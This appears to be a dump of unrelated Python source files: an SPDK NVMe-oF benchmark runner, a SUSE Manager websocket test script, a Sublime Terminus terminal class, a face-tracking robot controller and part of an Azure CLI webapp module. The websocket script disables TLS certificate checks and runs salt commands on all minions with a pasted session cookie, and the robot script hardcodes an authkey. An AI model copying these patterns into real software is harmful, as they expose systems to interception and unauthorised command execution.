self.log_print("Trying to connect %s %s %s" % subsystem)
self.exec_cmd(["sudo", self.nvmecli_bin, "connect", "-t", self.transport,
"-s", subsystem[0], "-n", subsystem[1], "-a", subsystem[2], self.extra_params])
time.sleep(2)
def kernel_init_disconnect(self, address_list, subsys_no):
for subsystem in self.subsystem_info_list:
self.exec_cmd(["sudo", self.nvmecli_bin, "disconnect", "-n", subsystem[1]])
time.sleep(1)
def gen_fio_filename_conf(self, threads, io_depth, num_jobs=1):
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
nvme_list = [x for x in out.split("\n") if "nvme" in x]
filename_section = ""
nvme_per_split = int(len(nvme_list) / len(threads))
remainder = len(nvme_list) % len(threads)
iterator = iter(nvme_list)
result = []
for i in range(len(threads)):
result.append([])
for j in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(SPDKInitiator, self).__init__(name, general_config, initiator_config)
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.install_spdk(self.spdk_dir)
# Required fields
self.num_cores = initiator_config["num_cores"]
def install_spdk(self, local_spdk_zip):
self.log_print("Using fio binary %s" % self.fio_bin)
self.exec_cmd(["git", "-C", self.spdk_dir, "submodule", "update", "--init"])
self.exec_cmd(["git", "-C", self.spdk_dir, "clean", "-ffdx"])
self.exec_cmd(["cd", self.spdk_dir, "&&", "./configure", "--with-rdma", "--with-fio=%s" % os.path.dirname(self.fio_bin)])
self.exec_cmd(["make", "-C", self.spdk_dir, "clean"])
self.exec_cmd(["make", "-C", self.spdk_dir, "-j$(($(nproc)*2))"])
self.log_print("SPDK built")
self.exec_cmd(["sudo", "%s/scripts/setup.sh" % self.spdk_dir])
def gen_spdk_bdev_conf(self, remote_subsystem_list):
bdev_cfg_section = {
"subsystems": [
{
"subsystem": "bdev",
"config": []
}
]
}
for i, subsys in enumerate(remote_subsystem_list):
sub_port, sub_nqn, sub_addr = map(lambda x: str(x), subsys)
nvme_ctrl = {
"method": "bdev_nvme_attach_controller",
"params": {
"name": "Nvme{}".format(i),
"trtype": self.transport,
"traddr": sub_addr,
"trsvcid": sub_port,
"subnqn": sub_nqn,
"adrfam": "IPv4"
}
}
if self.enable_adq:
nvme_ctrl["params"].update({"priority": "1"})
bdev_cfg_section["subsystems"][0]["config"].append(nvme_ctrl)
return json.dumps(bdev_cfg_section, indent=2)
def gen_fio_filename_conf(self, subsystems, threads, io_depth, num_jobs=1):
filename_section = ""
if len(threads) >= len(subsystems):
threads = range(0, len(subsystems))
filenames = ["Nvme%sn1" % x for x in range(0, len(subsystems))]
nvme_per_split = int(len(subsystems) / len(threads))
remainder = len(subsystems) % len(threads)
iterator = iter(filenames)
result = []
for i in range(len(threads)):
result.append([])
for j in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
if __name__ == "__main__":
spdk_zip_path = "/tmp/spdk.zip"
target_results_dir = "/tmp/results"
if (len(sys.argv) > 1):
config_file_path = sys.argv[1]
else:
script_full_dir = os.path.dirname(os.path.realpath(__file__))
config_file_path = os.path.join(script_full_dir, "config.json")
print("Using config file: %s" % config_file_path)
with open(config_file_path, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
general_config = data["general"]
target_config = data["target"]
initiator_configs = [data[x] for x in data.keys() if "initiator" in x]
for k, v in data.items():
if "target" in k:
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(k, data["general"], v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(k, data["general"], v)
pass
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(k, data["general"], v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(k, data["general"], v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
else:
continue
target_obj.tgt_start()
try:
os.mkdir(target_results_dir)
except FileExistsError:
pass
for i in initiators:
i.discover_subsystems(i.target_nic_ips, target_obj.subsys_no)
if i.enable_adq:
i.adq_configure_tc()
# Poor mans threading
# Run FIO tests
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect(i.target_nic_ips, target_obj.subsys_no)
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(target_results_dir, sar_file_name))
threads.append(t)
if target_obj.enable_pcm:
pcm_fnames = ["%s_%s_%s_%s.csv" % (block_size, rw, io_depth, x) for x in ["pcm_cpu", "pcm_memory", "pcm_power"]]
pcm_cpu_t = threading.Thread(target=target_obj.measure_pcm, args=(target_results_dir, pcm_fnames[0],))
pcm_mem_t = threading.Thread(target=target_obj.measure_pcm_memory, args=(target_results_dir, pcm_fnames[1],))
pcm_pow_t = threading.Thread(target=target_obj.measure_pcm_power, args=(target_results_dir, pcm_fnames[2],))
threads.append(pcm_cpu_t)
threads.append(pcm_mem_t)
threads.append(pcm_pow_t)
if target_obj.enable_bandwidth:
bandwidth_file_name = "_".join(["bandwidth", str(block_size), str(rw), str(io_depth)])
bandwidth_file_name = ".".join([bandwidth_file_name, "csv"])
t = threading.Thread(target=target_obj.measure_network_bandwidth, args=(target_results_dir, bandwidth_file_name,))
threads.append(t)
if target_obj.enable_dpdk_memory:
t = threading.Thread(target=target_obj.measure_dpdk_memory, args=(target_results_dir))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect(i.target_nic_ips, target_obj.subsys_no)
i.copy_result_files(target_results_dir)
target_obj.restore_governor()
target_obj.restore_tuned()
target_obj.restore_services()
target_obj.restore_sysctl()
for i in initiators:
i.restore_governor()
i.restore_tuned()
i.restore_services()
i.restore_sysctl()
target_obj.parse_results(target_results_dir)
|
websoctest.py
|
# (c) Copyright 2017-2018 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Requires:
# https://pypi.python.org/pypi/websocket-client/
# pip install websocket-client
# usage:
# python -i ws.py
# pprint outputs
# run_salt_command('udev.exportdb', '*')
import json
import os
import time
import threading
import ssl
import websocket
from pprint import pprint
from urlparse import urlparse
websocket.enableTrace(True)
ws = None
outputs = []
# login from the browser, and copy cookies, it should be something like this
#cookie = "DWRSESSIONID=c27VBRxV8fY4yD4wRbBICchKXQl; JSESSIONID=06B1EC5AC4243FEF33C842C32C8F158E; pxt-session-cookie=93x3b9a09b6e8662064fef12f11ce232817ef2358e05e22f5807ad9016ad85ccc21 "
cookie = os.environ['MANAGER_COOKIE']
parsed = urlparse(os.environ['MANAGER_URL'])
managerhostport = parsed.hostname
def on_error(ws, error):
print 'errord:', error
def on_close(ws):
print "### closed ###"
def on_open(ws):
print "### opened ###"
def run_salt_command(cmd, on):
ws.send(json.dumps(dict(
preview=False,
target=on,
command='salt-call --local --log-level quiet --out=json %s' % cmd
)))
def on_message(ws, message):
message = json.loads(message)
print message
outputs.append(message)
def retry(close=True):
global ws
if close:
ws.close()
connto = "wss://%s/rhn/websocket/minion/remote-commands" % managerhostport
ws = websocket.WebSocketApp(connto,
cookie=cookie,
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
kwargs = {'sslopt': {"cert_reqs": ssl.CERT_NONE}}
threading.Thread(target=ws.run_forever, kwargs=kwargs).start()
time.sleep(10)
ws.send(json.dumps({'preview': True, 'target': '*'}))
retry(False)
|
terminal.py
|
import sublime
import os
import time
import base64
import logging
import tempfile
import threading
from queue import Queue, Empty
from .ptty import TerminalPtyProcess, TerminalScreen, TerminalStream
from .utils import panel_window, view_size, responsive, intermission
from .key import get_key_code
from .image import get_image_info, image_resize
CONTINUATION = "\u200b\u200c\u200b"
IMAGE = """
<style>
body {{
margin: 1px;
}}
</style>
<img src="data:image/{what};base64,{data}" width="{width}" height="{height}"/>
"""
logger = logging.getLogger('Terminus')
class Terminal:
_terminals = {}
_detached_terminals = []
def __init__(self, view=None):
self._title = ""
self.view = view
self._cached_cursor = [0, 0]
self._cached_cursor_is_hidden = [True]
self.image_count = 0
self.images = {}
self._strings = Queue()
self._pending_to_send_string = [False]
self.lock = threading.Lock()
@classmethod
def from_id(cls, vid):
if vid not in cls._terminals:
return None
return cls._terminals[vid]
@classmethod
def from_tag(cls, tag):
for terminal in cls._terminals.values():
if terminal.tag == tag:
return terminal
return None
def attach_view(self, view, offset=None):
with self.lock:
self.view = view
self.detached = False
Terminal._terminals[view.id()] = self
if self in Terminal._detached_terminals:
Terminal._detached_terminals.remove(self)
self.view.settings().erase("terminus_view.detached")
# allow screen to be rerendered
self.screen.dirty.update(range(self.screen.lines))
self.set_offset(offset)
def detach_view(self):
with self.lock:
self.detached = True
Terminal._detached_terminals.append(self)
if self.view.id() in Terminal._terminals:
del Terminal._terminals[self.view.id()]
self.view.settings().set("terminus_view.detached", True)
self.view = None
def _need_to_render(self):
flag = False
if self.screen.dirty:
flag = True
elif self.screen.cursor.x != self._cached_cursor[0] or \
self.screen.cursor.y != self._cached_cursor[1]:
flag = True
elif self.screen.cursor.hidden != self._cached_cursor_is_hidden[0]:
flag = True
if flag:
self._cached_cursor[0] = self.screen.cursor.x
self._cached_cursor[1] = self.screen.cursor.y
self._cached_cursor_is_hidden[0] = self.screen.cursor.hidden
return flag
def _start_rendering(self):
data = [""]
done = [False]
@responsive(period=1, default=True)
def view_is_attached():
if self.detached:
# irrelevant if terminal is detached
return True
if self.panel_name:
return panel_window(self.view)
else:
return self.view.window()
@responsive(period=1, default=False)
def was_resized():
size = view_size(self.view)
return self.screen.lines != size[0] or self.screen.columns != size[1]
def reader():
while True:
try:
temp = self.process.read(1024)
except EOFError:
break
with self.lock:
data[0] += temp
if done[0] or not view_is_attached():
logger.debug("reader breaks")
break
done[0] = True
threading.Thread(target=reader).start()
def renderer():
def feed_data():
if len(data[0]) > 0:
logger.debug("receieved: {}".format(data[0]))
self.stream.feed(data[0])
data[0] = ""
while True:
with intermission(period=0.03), self.lock:
feed_data()
if not self.detached:
if was_resized():
self.handle_resize()
self.view.run_command("terminus_show_cursor")
if self._need_to_render():
self.view.run_command("terminus_render")
if done[0] or not view_is_attached():
logger.debug("renderer breaks")
break
feed_data()
done[0] = True
sublime.set_timeout(lambda: self.cleanup())
threading.Thread(target=renderer).start()
def set_offset(self, offset=None):
if offset is not None:
self.offset = offset
else:
if self.view and self.view.size() > 0:
view = self.view
self.offset = view.rowcol(view.size())[0] + 1
else:
self.offset = 0
logger.debug("activating with offset %s", self.offset)
def activate(
self, cmd, cwd=None, env=None, title=None,
panel_name=None, tag=None, auto_close=True):
view = self.view
if view:
self.detached = False
Terminal._terminals[view.id()] = self
else:
Terminal._detached_terminals.append(self)
self.detached = True
self.panel_name = panel_name
self.tag = tag
self.auto_close = auto_close
self.default_title = title
if view:
self.title = title
self.set_offset()
size = view_size(view or sublime.active_window().active_view())
if size == (1, 1):
size = (24, 80)
logger.debug("view size: {}".format(str(size)))
_env = os.environ.copy()
_env.update(env)
self.process = TerminalPtyProcess.spawn(cmd, cwd=cwd, env=_env, dimensions=size)
self.screen = TerminalScreen(size[1], size[0], process=self.process, history=10000)
self.stream = TerminalStream(self.screen)
self.screen.set_show_image_callback(self.show_image)
self._start_rendering()
def close(self):
logger.debug("close")
vid = self.view.id()
if vid in self._terminals:
del self._terminals[vid]
self.process.terminate()
def cleanup(self):
logger.debug("cleanup")
self.view.run_command("terminus_render")
# process might be still alive but view was detached
# make sure the process is terminated
self.close()
self.view.run_command(
"append",
{"characters": "\nprocess is terminated with return code {}.".format(
self.process.exitstatus)}),
self.view.set_read_only(True)
if self.process.exitstatus == 0 and self.auto_close:
self.view.run_command("terminus_close")
def handle_resize(self):
size = view_size(self.view)
logger.debug("handle resize {} {} -> {} {}".format(
self.screen.lines, self.screen.columns, size[0], size[1]))
self.process.setwinsize(*size)
self.screen.resize(*size)
@property
def title(self):
return self._title
@title.setter
def title(self, value):
if not self.detached:
self._title = value
self.view.set_name(value)
def send_key(self, *args, **kwargs):
kwargs["application_mode"] = self.application_mode_enabled()
kwargs["new_line_mode"] = self.new_line_mode_enabled()
self.send_string(get_key_code(*args, **kwargs), normalized=False)
def send_string(self, string, normalized=True):
if normalized:
# normalize CR and CRLF to CR (or CRLF if LNM)
string = string.replace("\r\n", "\n")
if self.new_line_mode_enabled():
string = string.replace("\n", "\r\n")
else:
string = string.replace("\n", "\r")
no_queue = not self._pending_to_send_string[0]
if no_queue and len(string) <= 512:
logger.debug("sent: {}".format(string[0:64] if len(string) > 64 else string))
self.process.write(string)
else:
for i in range(0, len(string), 512):
self._strings.put(string[i:i+512])
if no_queue:
self._pending_to_send_string[0] = True
threading.Thread(target=self.process_send_string).start()
def process_send_string(self):
while True:
try:
string = self._strings.get(False)
logger.debug("sent: {}".format(string[0:64] if len(string) > 64 else string))
self.process.write(string)
except Empty:
self._pending_to_send_string[0] = False
return
else:
time.sleep(0.1)
def bracketed_paste_mode_enabled(self):
return (2004 << 5) in self.screen.mode
def new_line_mode_enabled(self):
return (20 << 5) in self.screen.mode
def application_mode_enabled(self):
return (1 << 5) in self.screen.mode
def find_image(self, pt):
view = self.view
for pid in self.images:
region = view.query_phantom(pid)[0]
if region.end() == pt:
return pid
return None
def show_image(self, data, args, cr=None):
view = self.view
if "inline" not in args or not args["inline"]:
return
cursor = self.screen.cursor
pt = view.text_point(self.offset + cursor.y, cursor.x)
databytes = base64.decodebytes(data.encode())
image_info = get_image_info(databytes)
if not image_info:
logger.error("cannot get image info")
return
what, width, height = image_info
_, image_path = tempfile.mkstemp(suffix="." + what)
with open(image_path, "wb") as f:
f.write(databytes)
width, height = image_resize(
width,
height,
args["width"] if "width" in args else None,
args["height"] if "height" in args else None,
view.em_width(),
view.viewport_extent()[0] - 3 * view.em_width(),
args["preserveAspectRatio"] if "preserveAspectRatio" in args else 1
)
if self.find_image(pt):
self.view.run_command("terminus_insert", {"point": pt, "character": " "})
pt += 1
self.image_count += 1
p = view.add_phantom(
"terminus_image#{}".format(self.image_count),
sublime.Region(pt, pt),
IMAGE.format(
what=what,
data=data,
width=width,
height=height,
count=self.image_count),
sublime.LAYOUT_INLINE,
)
self.images[p] = image_path
if cr:
self.screen.index()
def clean_images(self):
view = self.view
for pid in list(self.images.keys()):
region = view.query_phantom(pid)[0]
if region.empty() and region.begin() == 0:
view.erase_phantom_by_id(pid)
if pid in self.images:
try:
os.remove(self.images[pid])
except Exception:
pass
del self.images[pid]
def __del__(self):
# make sure the process is terminated
self.process.terminate(force=True)
# remove images
for image_path in list(self.images.values()):
try:
os.remove(image_path)
except Exception:
pass
if self.process.isalive():
logger.debug("process becomes orphaned")
else:
logger.debug("process is terminated")
|
daisy_brain.py
|
#!/usr/bin/env python3
import sys
import os
import face_recognition
import cv2
from daisy_spine import DaisySpine
from daisy_spine import Dir
from daisy_eye import DaisyEye
from multiprocessing import Process, Queue
from multiprocessing.managers import SyncManager
import time
import argparse
class NeuronManager(SyncManager):
pass
NeuronManager.register('get_alexa_neuron')
connected = True
alexa_neuron = None
manager = NeuronManager(address=('', 4081), authkey=b'daisy')
try:
manager.connect()
alexa_neuron = manager.get_alexa_neuron()
print("Brain connected to neuron manager.")
except ConnectionRefusedError:
print("Brain not connected to neuron manager.")
connected = False
faces = {
"Jessie": "../faces/JPai-2.jpg",
"teddy": "../faces/Teddy-1.jpg",
"Vladimir": "../faces/Vlad-1.jpg"
}
name = "JessePai"
data = None
eye = None
X_THRES = 100
Z_CENTER = 1500
Z_THRES = 100
STANDING_THRES = 850
pid = -1
def begin_tracking(name, data_queue, video=True):
print("Begin Tracking")
print("Video: ", video)
eye = DaisyEye(faces, data_queue)
eye.find_and_track_kinect(None, "CSRT", video_out=video)
data_queue.close()
def daisy_action(data_queue, debug=True):
spine = DaisySpine()
print("Getting Data")
print("Debug: ", debug)
print(spine.read_all_lines())
data = None
prev_statement = ""
already_waiting = False
standing = True
prev_standing = True
while True:
state = None
direction = None
currCount = 0
if connected:
currNeuron = alexa_neuron.copy()
if "state" in currNeuron:
state = currNeuron.get("state")
if "count" in currNeuron:
currCount = currNeuron.get("count")
if state == "moving":
direction = currNeuron.get("direction")
if state is None or state == "idle" or state == "moving" or state == "exercise":
statement = ""
if direction is not None:
already_waiting = False
out = None
if direction == "left" or direction == "counterclockwise":
out = spine.turn(Dir.CCW)
elif direction == "right" or direction == "clockwise":
out = spine.turn(Dir.CW)
elif direction == "forward":
out = spine.forward()
elif direction == "backward":
out = spine.backward()
else:
out = spine.halt()
if debug:
statement = ("Moving:", direction, out)
if state == "exercise":
already_waiting = False
if not data_queue.empty():
data = data_queue.get()
if data:
(status, bbox, center, distance, res) = data
if status != "WAITING":
center_y = center[1]
if center_y < STANDING_THRES:
standing = True
if center_y > STANDING_THRES:
standing = False
if standing != prev_standing:
prev_standing = standing
currCount = currCount + 1
alexa_neuron.update([('count', currCount)])
print("Num Squats:", currCount)
if state == "idle" and not already_waiting:
print("Waiting")
alexa_neuron.update([('tracking', False)])
already_waiting = True
out = spine.halt()
statement = ("Idling", out)
if debug and statement != prev_statement:
prev_statement = statement
print(statement)
continue
if not data_queue.empty():
data = data_queue.get()
if data:
(status, bbox, center, distance, res) = data
if not status:
continue
if status == "STOP":
break
if status == "WAITING" and not already_waiting:
print("Waiting")
alexa_neuron.update([('tracking', False)])
already_waiting = True
out = spine.halt()
statement = ("Waiting for TARGET", out)
elif status != "WAITING":
already_waiting = False
center_x = center[0]
center_y = center[1]
res_center_x = int(res[0] / 2)
res_center_y = int(res[1] / 2)
out = None
if center_x < res_center_x - X_THRES:
out = spine.turn(Dir.CW)
elif center_x > res_center_x + X_THRES:
out = spine.turn(Dir.CCW)
elif distance > Z_CENTER + Z_THRES:
out = spine.forward()
elif distance < Z_CENTER - Z_THRES:
out = spine.backward()
else:
out = spine.halt()
if debug:
statement = (center_x, res_center_x, center, distance, res, out)
if debug and statement != prev_statement:
prev_statement = statement
print(statement)
data = None
print("Action Thread Exited")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Start Daisy's Brain")
parser.add_argument("--no-debug", action="store_const", const=True, help="Disable debug output")
parser.add_argument("--no-video", action="store_const", const=True, help="Disable video output")
args = parser.parse_args()
print("Daisy's Brain is Starting ^_^")
if connected:
# Clear alexa neuron.
alexa_neuron.clear()
data = Queue()
action_p = Process(target = daisy_action, args=(data, not args.no_debug, ))
action_p.daemon = True
action_p.start()
pid = action_p.pid
begin_tracking("JessePai", data, not args.no_video)
action_p.terminate()
print("Brain Terminated +_+")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import json
import ssl
import sys
import OpenSSL.crypto
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console
from azure.cli.core.util import open_page_in_browser
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, check_if_asp_exists, check_app_exists,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
tags=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = '8.11.1'
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
for name_value in settings + slot_settings:
# split at the first '=', appsetting should not have '=' in the name
settings_name, value = name_value.split('=', 1)
app_settings.properties[settings_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
